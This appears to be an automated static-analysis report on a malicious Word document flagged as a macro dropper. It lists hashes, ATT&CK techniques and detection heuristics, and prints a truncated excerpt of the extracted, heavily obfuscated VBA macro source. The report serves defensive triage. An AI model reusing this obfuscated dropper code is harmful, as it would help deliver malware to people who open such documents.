Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 632dec8befbd923f…

MALICIOUS

Office (OLE)

275.5 KB Created: 2018-03-01 07:54:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 863bad6a3c7e788baefa529ef8e59afb SHA-1: 491bfe8297671a8e4e45b3b8136951e6ada5cfbb SHA-256: 632dec8befbd923f2f4236289f029bbde199089fca40cd26207e9052e6f10f20
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OLE document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a Shell() call, indicating an attempt to run external commands or download additional payloads. ClamAV also identified the file as 'Doc.Dropper.Agent-6460587-0', further confirming its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6460587-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460587-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 87320 bytes
SHA-256: 23f00df91f0e8bc3d794f0a0a75c3e220e86634a1ac9599afc4ac14fc7ae212a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VSILdiRaTHJk"
Sub wZqVTYsXDo()
   On Error Resume Next
   While kwCEblBdllU < NdfTH
      Set LQEvfzkiT = cWNSicajfMziFf
      riXcrnFkCsXboR = 1088230 + Round(wRDAPYCY) - 7188732 * Cos(558748) / nuWdKYznTNBbKX + Chr(KaGBlPasCQCi)
      SbwrooRqfPM = rdmHv / tddNcSkQjNBT
   Wend
   Select Case ItOUrOK
      Case 7470027
         GvfLuwuln = HbIBGFzjHYED
         MCDJdJvskCXX = 6492295
      Case 6677903
         YlWwZPLl = sHPri
         ORCGS = Rnd(1634494)
      Case 8105010
         RcstWYliYWiI = Atn(4105523)
         FiZBR = Fix(695592 + 3266449 * 4086875 * DJhnFUbQIhwEW)
   End Select
   For WoMPNjsIahM = 2245272 To jRrmYwioj
      kfJwGaaYzjwD = 2432363 - oDmAu
      Select Case AbuwuzRvYHn
         Case 8653948
            zbkDmmiAIPbb = ChrW(EmwUKhtAoJ - CSng(NCGIiAqvDQNc))
            zzOLj = LSURufzDzGzmK
         Case 3478094
            qkjaVHZjYMrJtV = ChrB(ThQzzSs)
            LdhzspEiCKFJ = 3018397
      End Select
      lNjmmwEDVDh = Sitn - 7381200
      For RVMUjwzUwoKj = UiowoMvlwCOKj To 9244529
         IHdPGBmIpqY = (2140380 * 3162263 + oZZGvcV * Sin(XOVrBVS - CDbl(JzBSLpKuZohawH) * 3029130 * iXHdp) / 834068 * CLng(7190842 - CDate(KtkPuPzR)) / rhZJzCzPijGv + 9090789 / (PzUMiNpJ / OiISE - AKpPkHaqrhVHNK / Int(4493232 - Round(YPcUQZCVDz) + 6496568 / 5465210)))
      Next
   Next
End Sub
Function CdwwIoaoiK()
On Error Resume Next
FXSjVVWiz = "hrEIqPcJFHpEhTptDjkzUWLZPJTYaM&eh=%5rav% sAwi"
WTKCzYn = mFNrijMU = (1573857 * 3420887 + jMJoGWmtt * Sin(bdpFhZOCGb - CDbl(rTjOKZWDlMaW) * 7294871 * iYKFM) / 2175022 * CLng(5506042 - CDate(sLcXmBJwSBpk)) / saavzPqIOBGE + 89364 / (BEzuQ / CbYmnm - tmtYhBQlz / Int(6884150 - Round(OvmfdJ) + 4214538 / 3663680)))
zzqzzcQJu = wIuUHZamRCoI = (1999472 * 8918009 + VVcZCkQEUofVXX * Sin(OQUBXlsYRHaiUu - CDbl(AEAqKIhwQBhDZj) * 5349265 * DOToY) / 7635647 * CLng(1776402 - CDate(KcwLRcGwJ)) / naUhNpjTE + 9947640 / (hTspEWPBFXNvd / hLWinvluAtA - WBdIEjJhcJE / Int(4180167 - Round(FquEBaf) + 8173951 / 266485)))
ibnZLMZ = iuivbdfghnkjgyugjn(FXSjVVWiz, 5, 11)
MNwpBuOMi = "ROGKqzij% tes&&!%1zssMiowzuAEAGYY"
UOZIBikEZk = DWLdFHDqYb = (6810799 * 7172665 + YlnIzsi * Sin(XcRPVnQFzv - CDbl(JkXOOqkr) * 499967 * TnVYiEXrnNS) / 9479962 * CLng(9526091 - CDate(uuNkUmkYfOb)) / BXZSMBbvEp + 9213991 / (ritOMiBMnrTUc / XQwuH - wADzSV / Int(134041 - Round(VBbEwWsl) + 8572729 / 4141150)))
BrKdzqjbilz = zNPqJDE = (7961433 * 2377963 + LwJhpurfuw * Sin(hjqlQOVGIlXdi - CDbl(thKtvN) * 6143642 * nKFRWJbBFwZV) / 3067214 * CLng(5680957 - CDate(FtojiEsnT)) / YwNjmwjKtv + 6178234 / (wrMfGjZENtP / EAHizj - XlqwMOUTApKWhs / Int(4830478 - Round(wWCzLOONijEcl) + 8287083 / 971167)))
jEUnDruEVp = iuivbdfghnkjgyugjn(MNwpBuOMi, 16, 15)
HZBSRHd = "LsbJjziwbqodsptvPnnXBXL% tes&&s=%4rav%qb"
bkkjCKFKUDz = kzdnqbTkwsNc = (6257461 * 5964283 + QvzMPk * Sin(AqCaUtkC - CDbl(tTTtVq) * 7077750 * iiNHCwzjipP) / 7104674 * CLng(73139 - CDate(vATwm)) / QHZzvlTINlmZ + 2021995 / (ilXJzsFt / EURHsXTZYEzQ - ENLRioTtC / Int(7994369 - Round(jSJcJwufWS) + 4167976 / 5939072)))
IVpjhw = iakuMOVKDL = (6416461 * 2030221 + jNRavBfraaOqPZ * Sin(UtEiih - CDbl(DDYhnTPdHcRL) * 3556338 * OwWTzmDAWDw) / 7934911 * CLng(2316554 - CDate(KGwcRtJNBONLb)) / TlZEGcGwiOiujD + 6360623 / (kwHZSAdpt / XAuHFnLGh - irijjNYktWJF / Int(6191630 - Round(iPDBiSHjKhF) + 1118259 / 331747)))
PHuDnLSi = iuivbdfghnkjgyugjn(HZBSRHd, 3, 15)
LQcooZ = "SKnCnmtoofDDHYjHhQiDmQirqtIYdt"
YsUapm = BWOURqAl = (8307001 * 1863334 + ihmhuQFHDhcLi * Sin(fjfAjknSmZcT - CDbl(XbfSdKnaclW) * 2043668 * YKDlZ) / 2015848 * CLng(6963286 - CDate(lKUkHYEPuME)) / iijYPwBqLC + 9057194 / (phMdPB / RjzlQ - hWljKiY / Int(3373569 - Round(TpifVbJuWiP) + 2320620 / 8954693)))
WCGKJL = MbAtMnqizP = (2593207 * 6554080 + PHAUWrFOXz * Sin(fYIpdCBwnvZ - CDbl(K
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.